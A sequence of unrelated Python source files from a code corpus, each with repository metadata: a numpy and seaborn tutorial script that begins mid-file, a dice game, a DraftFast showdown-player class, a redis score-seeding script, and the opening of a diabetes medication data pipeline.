# create 1-D array of zeros with length 5
zeros_array= np.zeros(5)
print(zeros_array)
# create a 2-D array of ones with shape (3, 4)
ones_arr = np.ones((3,4))
print(ones_arr)
# create a 1D array of integers from 0 to 4
int_arr = np.arange(5)
print(int_arr)
# get the first element of arr1
x=arr1[0]
print(x)
# get the first row of arr2
row = arr2[0,:]
print(row)
# set every element of arr2's second row to 10 (row assignment broadcasts)
arr2[1] = 10
print(arr2)
# create a matrix using numpy.matrix()
mat1 = np.matrix([[1,2], [3,4]])
print(mat1)
# create an array using numpy.array() with dtype = 'object'
mat2 = np.array([[1,2],[3,4]], dtype = 'object')
print(mat2)
# "cast" an array with astype(np.matrix)
# NOTE(review): astype expects a dtype, so this yields an object-dtype
# array, not an np.matrix -- np.asmatrix() is the conventional conversion.
mat3 = np.array([[1,2],[3,4]]).astype(np.matrix)
print(mat3)
# check the number of dimensions of an array
arr = np.array([1,2,3, 4, 5])
print(arr.ndim)
# force a minimum number of dimensions at creation time with ndmin
arr = np.array([1,2,3, 4, ], ndmin=5)
print(arr)
# reshape: 6 elements -> 2x3; -1 lets numpy infer the last axis (2x3x1)
a= np.array([1, 2, 3, 4, 5, 6])
b=a.reshape((2,3))
print(b)
new_arr= a.reshape(2,3,-1)
print(new_arr)
#flatten array
arr= np.array([[1,2,3], [4,5,6]])
print(arr)
#flatten the array using flatten() method (always returns a copy)
flat_arr = arr.flatten()
print("Original array:")
print( arr)
print("flattened array: ")
# Bug fix: this used to print `arr` again instead of the flattened result.
print(flat_arr)
# flatten array using ravel() method (returns a view when possible)
import numpy as np
arr= np.array([[1,2,3], [4,5,6]])
#flatten the array
flat_arr = arr.ravel()
print("Original array: ")
print( arr)
print("flattened array: ")
# Bug fix: same here -- show the raveled array, not the original.
print(flat_arr)
# --- Iteration, joining, searching, sorting, filtering ---
#create a 2D array
arr = np.array([[1, 2, 3], [4, 5, 6]])
#iterate over the elements using a plain nested for loop
for i in range(arr.shape[0]):
    for j in range(arr.shape[1]):
        print(arr[i][j])
#iterate over every element using nditer() (any number of dimensions)
for element in np.nditer(arr):
    print(element)
#iterate over the elements and their (row, col) indices using ndenumerate()
for index, element in np.ndenumerate(arr):
    print(index, element)
#join two arrays using the concatenate() method
#create two arrays (shapes must match on all axes except the joined one)
arr1 = np.array([[1,2], [3,4]])
arr2=np.array([[5,6]])
#concatenate the arrays along axis 0 (stack the rows)
result = np.concatenate((arr1,arr2), axis=0)
print( result)
#join two arrays using the stack() method
#create two arrays
arr1 = np.array([1,2,3])
arr2=np.array([4,5,6])
#stack the arrays along a NEW axis (result shape is (2, 3))
result = np.stack((arr1,arr2), axis=0)
print( result)
#search inside an array using where()
#create an array
arr = np.array([1, 2, 3, 4, 5, 6])
#find the indices of elements equal to 2 (returns a tuple of index arrays)
indices = np.where( arr==2)
print(indices)
#search inside a sorted array using searchsorted() (binary search)
#create a sorted array
arr = np.array([1, 2, 3, 4, 5, 6])
#find the index where the value 3 should be inserted
index = np.searchsorted(arr,3)
print(index)
#sort an array using the sort() method (in place, unlike np.sort())
#create an array
arr = np.array([3, 1, 4, 2, 5])
#sort the array in ascending order
arr.sort()
print(arr)
#sort a 2D array in place along a chosen axis
#create an array
arr = np.array([[3, 2, 1], [4, 6, 5]])
#sort each column independently (axis=0 sorts down the rows)
arr.sort(axis=0)
print(arr)
#sort an array using argsort()
#create an array
arr = np.array([3, 1, 4, 2, 5])
#get the indices that would sort the array
indices = np.argsort(arr)
print(indices)
#sort the array using the indices (fancy indexing)
sorted_arr = arr[indices]
print(sorted_arr)
#filtering arrays with a boolean mask
#example 1: build the mask by hand
arr= np.array([41,42,43,44])
#create an empty list
filter_arr=[]
#go through each element in arr
for element in arr:
    #if the element is higher than 42, set the value to True, otherwise False:
    if element > 42:
        filter_arr.append(True)
    else:
        filter_arr.append(False)
new_arr= arr[ filter_arr]
print(new_arr)
#example 2: filter directly with a vectorized comparison
arr = np.array([41, 42, 43, 44])
filter_arr = arr>42
# Bug fix: the original printed the unfiltered `arr`, so the mask was
# never applied; select with it and show the filtered result instead.
new_arr = arr[filter_arr]
print(new_arr)
#example 3: mask from a modulo test, built by hand
arr = np.array([1,2,3,4,5,6,7])
#create an empty list
filter_arr = []
#go through each element in arr
for element in arr:
    #if the element is completely divisible by 2, set the value to True, otherwise False
    if element%2 == 0:
        filter_arr.append(True)
    else:
        filter_arr.append(False)
new_arr = arr[filter_arr]
print(new_arr)
#example 4: same filter, fully vectorized
arr = np.array([1, 2, 3, 4, 5, 6, 7])
filter_arr = arr %2 ==0
new_arr = arr[filter_arr]
print(new_arr)
# --- Random sampling ---
#uniform [0, 1) floats with numpy.random.rand
random_array = np.random.rand(3,3)
print(random_array)
#standard-normal samples with numpy.random.randn
random_array = np.random.randn(3,3)
print(random_array)
#integers in [1, 10) with numpy.random.randint
random_array = np.random.randint(1, 10, size=(3,3))
print( random_array)
#example 2: a single random int in [0, 100) via numpy's random module
from numpy import random
x= random.randint(100)
print(x)
#random sampling with the choice() method
#example 1: generate a random sample of size 3 from an array
a = np.array([1, 2, 3, 4, 5])
random_sample = np.random.choice(a, size=3)
print(random_sample) #e.g. [2 5 4] -- output varies per run
#Example 2: Generate a random sample of size 3 without replacement
a = np.array([1, 2, 3, 4, 5])
random_sample = np.random.choice(a, size = 3, replace= False)
print( random_sample) #e.g. [3 1 4] -- output varies per run
#Example 3: Generate a random sample of size 3 with custom probabilities
a= np.array([1, 2, 3, 4, 5])
p = [0.1, 0.2, 0.3, 0.2, 0.2] #probabilities associated with each element in a
random_sample = np.random.choice(a, size=3, replace= False, p=p)
print(random_sample) #e.g. [2 1 3] -- output varies per run
# --- Data distributions ---
# NOTE(review): sns.distplot is deprecated in modern seaborn; these calls
# presumably target an older seaborn -- kdeplot/histplot are the successors.
#uniform distribution
random_numbers = np.random.uniform(low=0, high=1, size=(3,3))
print(random_numbers)
random_numbers = np.random.uniform(low=0, high=1, size=10000)
sns.distplot(random_numbers, hist = False)
plt.title('uniform Distribution of random numbers')
plt.show()
#normal distribution
random_numbers = np.random.normal(loc=0, scale=1, size=(3,3))
print(random_numbers)
random_numbers = np.random.normal(loc=0, scale=1, size=10000)
sns.distplot(random_numbers, hist = False)
plt.title('normal Distribution of random numbers')
plt.show()
#binomial distribution
random_numbers = np.random.binomial(n=10, p=0.5, size=(3,3))
print(random_numbers)
random_numbers = np.random.binomial(n=10, p=0.5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('binomial Distribution of random numbers')
plt.show()
#difference between normal and binomial distribution :
sns.kdeplot(np.random.normal(loc=0, scale=1, size=100000), label="normal distribution")
sns.kdeplot(np.random.binomial(n=4, p=0.5, size = 100000), label="binomial distribution")
plt.title("Difference between normal and binomial distribution")
plt.legend()# show the series labels
plt.show()
#poisson distribution
random_numbers = np.random.poisson(lam=5, size=(3,3))
print(random_numbers)
random_numbers = np.random.poisson(lam=5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('poisson Distribution of random numbers')
plt.show()
#difference between normal and poisson distribution
sns.distplot(random.normal(loc=0, scale=1, size=100000), hist=False, label="normal distribution")
sns.distplot(random.poisson(lam=5, size = 100000), hist= False, label= "poisson distribution")
plt.title("difference between normal and poisson distribution")
plt.legend()
plt.show()
#difference between poisson and binomial distribution
sns.distplot(np.random.binomial(n=4, p=0.5, size= 100000), hist=False, label= "binomial distribution")
sns.distplot(np.random.poisson(lam=5, size= 100000), hist=False, label="poisson distribution")
plt.title("difference between poisson and binomial distribution")
plt.legend()
plt.show()
#logistic distribution
#set the parameters of the logistic distribution
m = 5.0 # location parameter
s = 1.0# scale parameter
#generate a logistic distribution with 1000 samples
samples = np.random.logistic(m,s, size= 1000)
print("this is logistic distribution :", samples)
#plot a histogram of the samples with a KDE overlay
plt.hist(samples, bins=50, density= True)
sns.distplot(samples, hist=False, label='Logistic distribution')
plt.title("Logistic distribution")
plt.xlabel("x-axis")
plt.ylabel("Density")
plt.legend()
plt.show()
plt.show()
#difference between normal and logistic distribution
sns.distplot(random.normal(scale=2, size=1000), hist = False, label = "Normal distribution")
sns.distplot(random.logistic(size =1000), hist=False, label="Logistic distribution")
plt.title("Difference between Normal and Logistic distribution")
plt.xlabel("x-axis")
plt.ylabel("Density")
plt.legend()
plt.show()
#multinomial distribution
n_trials =10
pvals = [0.2, 0.3, 0.5]
n_samples = 5
samples= np.random.multinomial(n=n_trials, pvals=pvals, size= n_samples)
print("multinomial distribution : ", samples)
# Stacked bar chart: one bar segment per sample, stacked per outcome.
fig, ax = plt.subplots()
ax.bar(range(len(pvals)), samples[0], label="Sample 1")
ax.bar(range(len(pvals)), samples[1], bottom=samples[0], label="Sample2")
ax.bar(range(len(pvals)), samples[2], bottom=samples[0]+samples[1], label="Sample3")
ax.bar(range(len(pvals)), samples[3], bottom=samples[0]+samples[1]+samples[2], label="Sample4")
ax.bar(range(len(pvals)), samples[4], bottom=samples[0]+samples[1]+samples[2]+samples[3], label="Sample5")
ax.set_xticks(range(len(pvals)))
ax.set_xticklabels(["Outcome1", "Outcome2", "Outcome3"])
ax.set_xlabel("Outcomes")
ax.set_ylabel("Counts")
ax.set_title(f"Multinomial Distribution (n={n_trials}, p={pvals}, samples={n_samples})")
ax.legend()
plt.show()
#Rayleigh distribution
sigma = 2
n_samples=1000
samples = np.random.rayleigh(scale=sigma, size=n_samples)
fig , ax = plt.subplots()
ax.hist(samples, bins=30, density= True)
ax.set_xlabel("x")
ax.set_ylabel("Probability density function ")
ax.set_title(f"Rayleigh distribution ( sigma={sigma}, samples={n_samples})")
plt.show()
sns.distplot(np.random.rayleigh(size=1000), hist= False)
plt.title("Rayleigh distribution")
plt.xlabel("X-axis")
plt.ylabel("Density")
plt.show()
#pareto distribution
samples = np.random.pareto(a=3, size=1000)
print("Mean: ", np.mean(samples))
print("Median:", np.median(samples))
print("Standard deviation:", np.std(samples))
plt.hist(samples, bins=50, density=True, alpha=0.5)
# Overlay the analytic density for shape a=3: pdf(x) = a / x**(a+1)
x=np.linspace(0.01, 10, 1000)
y = 3 * (x**(-4))
plt.plot(x,y,'r-', lw=2)
plt.xlabel("x")
plt.ylabel("Probability density")
plt.title("Pareto distribution with shape parameter a=3")
plt.show()
#zipf distribution
samples = np.random.zipf(a=2, size=1000)
print("Mean:", np.mean(samples))
print("Median: ", np.median(samples))
print("Standard deviation: ", np.std(samples))
samples = np.random.zipf(a=2, size=1000)
# Empirical value frequencies on log-log axes.
values, counts = np.unique(samples, return_counts=True)
freqs = counts/len(samples)
fig, ax = plt.subplots()
ax.loglog(values, freqs, 'bo')
ax.set_xscale('log', base=2)
ax.set_yscale('log', base=10)
plt.xlabel("Rank")
plt.ylabel("Frequency")
plt.title("Zipf distribution with shape parameter a=2")
plt.show()
#exponential distribution
random_numbers = np.random.exponential(scale=2, size=(3,3))
print(random_numbers)
random_numbers = np.random.exponential(scale=2, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('exponential Distribution of random numbers')
plt.show()
#gamma distribution
random_numbers = np.random.gamma(shape=2, scale=2, size=(3,3))
print(random_numbers)
random_numbers = np.random.gamma(shape=2, scale=2, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('gamma Distribution of random numbers')
plt.show()
#beta distribution
random_numbers = np.random.beta(a=2, b=5, size=(3,3))
print(random_numbers)
random_numbers = np.random.beta(a=2, b=5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('beta Distribution of random numbers')
plt.show()
#chi square distribution
random_numbers= np.random.chisquare( df=3, size=(3,3))
print(random_numbers)
random_numbers= np.random.chisquare( df=3, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('chi square Distribution of random numbers')
plt.show()
#geometric distribution
random_numbers= np.random.geometric( p=0.5, size=(3,3))
print(random_numbers)
random_numbers= np.random.geometric( p=0.5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('geometric Distribution of random numbers')
plt.show()
#weibull distribution
random_numbers= np.random.weibull( a=2, size=(3,3))
print(random_numbers)
random_numbers= np.random.weibull( a=2, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('weibull Distribution of random numbers')
plt.show()
#permutation: returns a shuffled COPY, the original is untouched
arr = np.arange(5)
permutations = np.random.permutation(arr)
print("original array:", arr)
print("permutation: ", permutations)
#shuffle: in place -- NOTE the return value is None, so `shuf` is None here
arr = np.arange(5)
shuf = np.random.shuffle(arr)
print("shuffled array:", arr)
#universal function (ufunc): np.sin applies element-wise
x = np.linspace(0,2*np.pi, 100)
y = np.sin(x)
print(y)
# trigonometric functions on an array of angles in radians
arr = np.array([np.pi/2, np.pi/3, np.pi/4, np.pi/5])
y= np.sin(arr)
plt.plot(arr, y)
plt.xlabel("angle(radian)")
plt.ylabel("sine")
plt.title("sine wave")
plt.show()
| hatimbenjebara/numpy_in_python | numpy_lib.py | numpy_lib.py | py | 13,365 | python | en | code | 1 | github-code | 13 |
2609945827 | from random import randint
# Dice-roll loop: keep rolling while the user answers yes.
# Fixes: the original rolled the die once before asking and never showed
# that roll (dead code, removed); input is normalized so "Yes" / "YES "
# also continue, where previously only the exact string "yes" worked.
answer = input("Do you want to roll the die: ")
while answer.strip().lower() == "yes":
    roll = randint(1, 6)
    print("Dice rolling...")
    print(roll, "\n")
    answer = input("Do you want to roll the die: ")
print("Thanks for playing")
| Aadhithr/Personal | PythonWork/PythonCourse/homework/uses_random/diceSimulator.py | diceSimulator.py | py | 257 | python | en | code | 0 | github-code | 13 |
7067614679 | from draftfast.orm import Player
from typing import Optional
from copy import deepcopy
class ShowdownPlayer(Player):
    """A Player wrapped for DFS "showdown" slates, where one roster slot is
    the captain (CPT) and the rest are FLEX."""

    def __init__(
        self,
        player: Player,
        captain: bool = False,
        pos: Optional[str] = None
    ):
        # Copy every attribute of the wrapped player onto this instance,
        # skipping names already present on the class and dunders; deepcopy
        # keeps the two objects independent.
        for k, v in player.__dict__.items():
            if hasattr(self, k) or k.startswith('__'):
                continue
            setattr(self, k, deepcopy(v))
        if captain:
            # The captain keeps their real position for display but
            # occupies the dedicated CPT slot.
            self.real_pos = self.pos
            self.pos = 'CPT'
            self.captain = True
        else:
            if pos:
                # Explicit position override (slate-specific slot name).
                self.pos = pos
                self.real_pos = pos
            else:
                self.real_pos = self.pos
                self.pos = 'FLEX'
            self.captain = False

    @property
    def formatted_position(self):
        """Slot plus the underlying real position, e.g. ``CPT (QB)``."""
        return '{} ({})'.format(self.pos, self.real_pos)

    @property
    def is_captain(self):
        """True when this entry occupies the captain slot."""
        return self.pos == 'CPT'

    @property
    def roster_id(self):
        """
        Used for roster equality.
        Unlike classic, position matters in showdown at CPT level.
        """
        return f'{self.name} {self.team} {self.is_captain}'

    @property
    def v_avg(self):
        """
        Normalize average comparison for captain.
        """
        # NOTE(review): dividing by 1.5 assumes the captain's proj was
        # stored with the 1.5x CPT multiplier already applied -- confirm
        # upstream before changing.
        if self.is_captain:
            return self.proj / 1.5 - self.average_score
        return self.proj - self.average_score
| sam1rm/draftfast | draftfast/showdown/orm.py | orm.py | py | 1,406 | python | en | code | null | github-code | 13 |
22337977927 | #!/bin/env python
import random, redis
teams = ['ARG','BWS','BWS2','BGR','BRK','BSG','CLF','CLF2','EMM','GRS','GMR','HRS','HZW','MFG','MUC','PSC','PSC2','QEH','QMC','SEN','SEN2','TTN']
actor = redis.Redis(host='localhost',port=6379,db=0)
def game_points(score):
    """Compute a match score from one raw score row.

    Indices 2..5 of *score* are (robot, zone, bucket, n_buckets); values
    may be ints or numeric strings. Points are robot + 2*zone + 5*bucket,
    multiplied by n_buckets when n_buckets is greater than one.
    """
    robot, zone, bucket, n_buckets = (int(v) for v in score[2:6])
    points = robot + 2 * zone + 5 * bucket
    if n_buckets > 1:
        points *= n_buckets
    return points
# Seed 21 matches x 4 slots with random scores: store the raw per-match
# fields in a redis hash and accumulate each team's total league points.
for i in range(21):
    for j in range(4):
        r = int(random.random()*10)  # robot tokens (0-9)
        z = int(random.random()*10)  # zone tokens (0-9)
        b = int(random.random()*10)  # bucket tokens (0-9)
        n = int(random.random()*10)%5  # bucket count (0-4)
        s = game_points([0,0,r,z,b,n])  # first two slots are unused by game_points
        # NOTE(review): hmset is deprecated in newer redis-py releases —
        # confirm the installed client version before upgrading.
        actor.hmset('org.srobo.scores.match.{0}.{1}'.format(i,j),{'trobot':r,'tzone':z,'tbucket':b,'nbuckets':n})
        actor.incr('org.srobo.scores.team.{0}'.format(teams[i]),s)
42855697480 | #!/usr/bin/env python3
import os
import time
import hashlib
from pathlib import Path
from functools import lru_cache
import logging
import fire
from tqdm import tqdm
import pandas as pd
import numpy as np
BASE_PATH = Path.cwd()  # working directory at import time
LOG_PATH = BASE_PATH / 'log'  # per-day log files are written here
LOG_PATH.mkdir(parents=True, exist_ok=True)  # created eagerly on import
class Logger(object):
    """Configure the shared ``logging.getLogger("log")`` logger with a daily
    file handler (``log/YYYY-MM-DD.log``) and a console handler.

    All instances share the same underlying logger object. Handlers are
    attached only once: previously every ``Logger(...)`` call appended a
    fresh pair of handlers, so each record was emitted multiple times after
    repeated instantiation.
    """

    def __init__(self, log_level=logging.DEBUG):
        # One log file per day.
        self.logname = os.path.join(LOG_PATH, "{}.log".format(time.strftime("%Y-%m-%d")))
        self.logger = logging.getLogger("log")
        self.logger.setLevel(log_level)
        self.formater = logging.Formatter(
            '[%(asctime)s][%(filename)s %(lineno)d][%(levelname)s]: %(message)s')
        self.filelogger = logging.FileHandler(self.logname, mode='a', encoding="UTF-8")
        self.console = logging.StreamHandler()
        self.console.setLevel(log_level)
        self.filelogger.setLevel(log_level)
        self.filelogger.setFormatter(self.formater)
        self.console.setFormatter(self.formater)
        # Bug fix: guard against duplicate handler registration.
        if not self.logger.handlers:
            self.logger.addHandler(self.filelogger)
            self.logger.addHandler(self.console)
# Module-wide logger shared by all pipeline steps. Level is WARNING, so
# the info() call right below (and all logger.info(...) in this module)
# is filtered out unless the level is lowered.
logger = Logger(log_level=logging.WARNING).logger
logger.info("Start...")
# Support running this file both as a plain script (absolute import of the
# sibling `rl` module) and as a package module (relative import).
if (__name__ == '__main__') or (__package__ == ''):
    from rl import glu2reward
    from rl import reward2return
else:
    from .rl import glu2reward
    from .rl import reward2return
def hash_func(s):
    """Deterministic integer hash of *s*: its MD5 digest as a big-endian int.

    Used to shard work reproducibly across processes/splits (unlike the
    builtin hash(), this is stable across interpreter runs).
    """
    digest = hashlib.md5(s.encode()).digest()
    return int.from_bytes(digest, byteorder='big')
def func_args_output_helper(args):
    """Unpack ``(func, input_path, output_path, kwargs)`` and invoke func.

    Adapter so ``multiprocessing.Pool.imap_unordered`` can dispatch calls
    that mix positional and keyword arguments. Returns None.
    """
    fn, in_path, out_path, kwargs = args
    fn(in_path, out_path, **kwargs)
def func_args_stat_helper(args):
    """Unpack ``(func, path, kwargs)``, call func and return its result.

    Multiprocessing adapter for statistics-style jobs that produce a value
    instead of writing an output file.
    """
    fn, in_path, kwargs = args
    return fn(in_path, **kwargs)
def parse_long_list(arg):
    """Normalize *arg* into a list.

    Strings are split on ',' (a comma-free string becomes a one-element
    list); tuples become lists; any other value (including an existing
    list) is returned unchanged.
    """
    if isinstance(arg, str):
        return arg.split(',') if ',' in arg else [arg]
    if isinstance(arg, tuple):
        return list(arg)
    return arg
def datetime_time_norm(sr, times_bin, times_norm, labels=None):
    """Snap the time-of-day of each timestamp onto a canonical time point.

    sr: datetime Series.
    times_bin: bin edges as time-of-day strings (len == len(times_norm)+1).
    times_norm: canonical 'HH:MM:SS' strings, one per bin.
    labels: optional short labels replacing times_norm in the returned
        category Series.

    Returns (normalized datetime Series — NaT where out of range —
    and the per-row bin label Series).
    """
    bins = [pd.Timedelta(t) for t in times_bin]
    # Offset of each timestamp from its own midnight.
    time_of_day = sr - sr.dt.floor('d')
    sr_norm = pd.cut(time_of_day, bins=bins, labels=times_norm)
    if labels:
        sr_label = sr_norm.cat.rename_categories(dict(zip(times_norm, labels)))
    else:
        sr_label = sr_norm
    # Rebuild a full timestamp from the original date + canonical time.
    combined = sr.dt.date.astype('str') + ' ' + sr_norm.astype('str')
    normalized = pd.to_datetime(combined, errors='coerce')
    return normalized, sr_label
def ts_complete(df, col_datetime, col_timegroup, freq, n_timegroup, col_name='step'):
    """
    Time series completion: assign every row a global step index and
    reindex so that every step from 0 to the max is present (missing
    steps become all-NaN rows, except the timegroup which is refilled).

    col_datetime: str
        date column
    col_timegroup: str
        intra-day slot column (0 .. n_timegroup-1)
    freq: str
        frequency, such as:
        - 'D'
    n_timegroup: int
        number of time aggregates per frequency base, such as:
        - 7
    col_name: str
        name of the resulting step index column/index.
    """
    df = df.copy()
    df[col_timegroup] = df[col_timegroup].astype('int')
    df[col_datetime] = pd.to_datetime(df[col_datetime])
    # Whole-period bucket of each timestamp and its ordinal from the start.
    df['_date'] = df[col_datetime].dt.floor(freq)
    df['_date_order'] = ((df['_date'] - df['_date'].min()) / pd.Timedelta(1, unit=freq)).astype('int')
    df[col_name] = df['_date_order'] * n_timegroup + df[col_timegroup]  # calculate time series order
    df[col_name] = df[col_name].astype('int')
    df = df.drop_duplicates(col_name)  # normal data does not have duplicates
    df = df.set_index(col_name)
    if len(df) > 0:
        df = df.reindex(index=np.arange(df.index.max() + 1))  # complete the time series and complete the sorting
    df = df.drop(columns=['_date', '_date_order'])
    # complete timegroup: repeat 0..n_timegroup-1 cyclically over all rows
    timegroups = np.tile(np.arange(n_timegroup), len(df) // n_timegroup + 1)
    df[col_timegroup] = timegroups[:len(df)]
    return df
def get_datetime_span(dt, deltas=('7D', '7D')):
    """Return a (start, end) window centred on the median of *dt*.

    dt: datetime Series; deltas: (before, after) Timedelta-compatible
    strings. With the default ('7D', '7D') this yields a 14-day span.
    """
    median = dt.quantile(0.5)
    start = median - pd.Timedelta(deltas[0])
    end = median + pd.Timedelta(deltas[1])
    return start, end
def read_csv_or_df(path, **kargs):
    """Accept either an in-memory DataFrame (returned as-is, kargs ignored)
    or anything ``pandas.read_csv`` understands, forwarding **kargs."""
    if isinstance(path, pd.DataFrame):
        return path
    return pd.read_csv(path, **kargs)
def df2map(df, col_key, col_val):
    """Build a key->value Series from two columns, keeping the first
    occurrence of each key."""
    deduped = df.drop_duplicates(col_key)
    return deduped.set_index(col_key)[col_val]
def move_cols_follow(df, col_anchor, cols_to_follow):
    """Reorder columns so *cols_to_follow* sit right after *col_anchor*.

    c1, c2, c_anchor, ..., c_to_follow (col_to_follow can start anywhere)
    -> c1, c2, c_anchor, c_to_follow, ...

    Note: the anchor's position is looked up in the ORIGINAL column index
    (before the followers are removed), matching historical behavior.
    """
    if isinstance(cols_to_follow, str):
        cols_to_follow = [cols_to_follow]
    remaining = list(df.columns.drop(cols_to_follow))
    anchor_pos = df.columns.get_loc(col_anchor)
    new_order = remaining[:anchor_pos + 1] + cols_to_follow + remaining[anchor_pos + 1:]
    return df.reindex(columns=new_order)
def get_day_freq(t_start, t_end, hour, minute):
    """Daily timestamps at hour:minute within [t_start, t_end].

    The series starts at the first occurrence of hour:minute at or after
    t_start and steps in whole days up to (and including) t_end.
    """
    first = t_start.replace(hour=hour, minute=minute)
    if first < t_start:
        first = first + pd.Timedelta(1, unit='D')
    return pd.date_range(start=first, end=t_end, freq='D')
def get_drug_time(scheme, start_time, days, hour_points=(8, 12, 16, 20)):
    """Expand an insulin scheme into (drug, timestamp) administration pairs.

    scheme: one drug label per daily administration slot; entries equal to
        '无' ("none") or 'na' are skipped.
    start_time: Timestamp-compatible start of the treatment window.
    days: length of the window in days.
    hour_points: the hour of day of each slot (paired with scheme by zip).
        Fixed the mutable-default-argument anti-pattern by using a tuple;
        callers passing a list are unaffected.

    Returns a list of (drug, Timestamp) tuples.
    """
    t_start = pd.Timestamp(start_time)
    t_end = t_start + pd.Timedelta(days, unit='D')
    pairs = []
    for drug, hour in zip(scheme, hour_points):
        if drug in ['无', 'na']:
            continue
        pairs += [(drug, t) for t in get_day_freq(t_start, t_end, hour=hour, minute=0)]
    return pairs
def make_drug_option(scheme, start_time, days, hour_points=(8, 12, 16, 20)):
    """Expand an insulin scheme into sparse 'insulin_group' option rows.

    Each administration slot becomes one row with columns
    (value=drug label, datetime, key='insulin_group', key_group='insulin'),
    matching the sparse-record schema used by the pipelines.
    Mutable default argument replaced with a tuple (behavior unchanged).
    """
    points = get_drug_time(scheme, start_time, days, hour_points=hour_points)
    df_option = pd.DataFrame(points, columns=['value', 'datetime'])
    df_option['key'] = 'insulin_group'
    df_option['key_group'] = 'insulin'
    return df_option
class DiabetesPipeline(object):
def __init__(self, num_workers=0):
super(DiabetesPipeline, self).__init__()
if num_workers is None:
num_workers = 0
elif num_workers == 0:
num_workers = 1
elif num_workers < 0:
num_workers = -1
self._num_workers = num_workers
def _std_df_output(self, df, output_path, with_suffix=None):
if output_path is None:
return df
elif output_path == 'print':
print(df)
elif output_path == 'skip':
return
else:
output_path = Path(output_path)
if with_suffix:
output_path = output_path.with_suffix(with_suffix)
output_path.parent.mkdir(parents=True, exist_ok=True)
df.to_csv(output_path, index=False)
    @lru_cache(10)
    def _get_drug_meta(self, path):
        """
        Load the hypoglycemic-drug metadata sheet (cached per path).

        Returns:
            df_drug_meta: all drug information
            drug_name2group: drug name -> drug category
            drug_name2min: drug name -> reasonable min dose (NaN -> 0)
            drug_name2max: drug name -> reasonable max dose

        NOTE(review): lru_cache on an instance method keys on `self` and
        keeps the instance alive for the cache lifetime; acceptable here
        since the pipeline object is long-lived.
        """
        # drug
        df_drug_meta = pd.read_excel(path)
        # Column names below are Chinese headers of the meta sheet
        # ('药物类' = drug category, '用药(通用名称)' = generic drug name,
        #  '合理min'/'合理max' = reasonable min/max dose).
        # df_drug_meta = df_drug_meta[df_drug_meta['drug'].notna()]
        df_drug_meta = df_drug_meta[df_drug_meta['药物类'].notna()]
        # df_drug_meta = df_drug_meta.rename(columns={'drug': 'drug_type'})
        df_drug_meta = df_drug_meta.rename(columns={'药物类': 'drug_type'})
        # df_drug_meta['reasonable min'] = df_drug_meta['reasonable min'].fillna(0)
        df_drug_meta['合理min'] = df_drug_meta['合理min'].fillna(0)
        # drug_name2group = df2map(df_drug_meta, 'medication (common Name)', 'drug_type')
        drug_name2group = df2map(df_drug_meta, '用药(通用名称)', 'drug_type')
        # drug_name2min = df2map(df_drug_meta, 'medication (common Name)', 'reasonable min')
        drug_name2min = df2map(df_drug_meta, '用药(通用名称)', '合理min')
        # drug_name2max = df2map(df_drug_meta, 'medication (common Name)', 'reasonable max')
        drug_name2max = df2map(df_drug_meta, '用药(通用名称)', '合理max')
        # NOTE(review): the two expressions below discard their results —
        # they look like leftover debugging statements.
        df_drug_meta.head(2)
        df_drug_meta.sort_values('size', ascending=False)
        return df_drug_meta, drug_name2group, drug_name2min, drug_name2max
    def pipeline1_drug(self, input_path, output_path, drug_meta_path, verbose=0):
        '''
        Process the medication records in input_path: map each drug name to
        its category, drop drugs not present in the meta list, and drop
        records whose dose falls outside the drug's reasonable [min, max]
        range (insulin records are always kept regardless of dose).
        '''
        df_drug_meta, drug_name2group, drug_name2min, drug_name2max = self._get_drug_meta(drug_meta_path)
        df_drug = read_csv_or_df(input_path)
        df_drug_output = df_drug
        # drug category mapping
        df_drug_output['drug_group'] = df_drug_output['drug_name'].map(drug_name2group)
        if verbose:
            # NOTE(review): verbose branch is an unimplemented stub.
            pass
        # If the category value lacks, but the name contains insulin, it is classified as insulin.
        # ('胰岛素' = insulin)
        df_drug_output['drug_group'] = df_drug_output['drug_group'].mask(
            # df_drug_output['drug_group'].isna() & df_drug_output['drug_name'].str.contains('insulin'), 'insulin')
            df_drug_output['drug_group'].isna() & df_drug_output['drug_name'].str.contains('胰岛素'), '胰岛素')
        # remove data that is not in the drug list
        df_drug_output_t = df_drug_output.dropna(subset=['drug_group'])
        df_drug_output = df_drug_output_t
        # remove doctor's advice with unreasonable medication values
        min_ok = df_drug_output['value'] >= df_drug_output['drug_name'].map(drug_name2min)
        max_ok = df_drug_output['value'] <= df_drug_output['drug_name'].map(drug_name2max)
        # df_drug_output_t = df_drug_output[(min_ok & max_ok) | df_drug_output['drug_group'].isin(['insulin'])]
        df_drug_output_t = df_drug_output[(min_ok & max_ok) | df_drug_output['drug_group'].isin(['胰岛素'])]
        df_drug_output = df_drug_output_t
        logger.info("medication information processing completed, in total %s items" % df_drug_output.shape[0])
        return self._std_df_output(df_drug_output, output_path)
    @lru_cache(10)
    def _get_insulin_meta(self, path):
        '''
        Load the insulin classification sheet (cached per path).

        Returns:
            df_insulin_meta: all insulin information
            insulin2group: insulin drug name -> simplified category
            insulin_list: category vocabulary, with '无' ("none") first
        '''
        df_insulin_meta = pd.read_excel(path)
        # '类别' = category, '类似物' = "analogue": strip the analogue suffix so
        # an insulin and its analogue share the same simplified category '类别简'.
        # df_insulin_meta['category brief'] = df_insulin_meta['category'].str.replace('like', '')
        df_insulin_meta['类别简'] = df_insulin_meta['类别'].str.replace('类似物',
                                                                 '')  # In terms of category, xxx analogues and xxx are considered to be the same category of drugs
        # insulin2group = df2map(df_insulin_meta, 'drug name', 'category brief')
        insulin2group = df2map(df_insulin_meta, '药名', '类别简')
        # insulin_list = ['None'] + list(sorted(insulin2group.dropna().unique()))
        insulin_list = ['无'] + list(sorted(insulin2group.dropna().unique()))
        return df_insulin_meta, insulin2group, insulin_list
    def pipeline1_insulin(self, input_path, output_path, drug_meta_path, insulin_meta_path):
        '''
        Process the insulin records in input_path: keep doses in [1, 50],
        keep only insulin-group rows, and (once per sample) add derived
        'insulin_group' category rows mapped through the insulin meta sheet.
        Unmapped names fall back to '预混胰岛素' (premixed insulin) with a warning.
        '''
        df_drug_meta, drug_name2group, drug_name2min, drug_name2max = self._get_drug_meta(drug_meta_path)
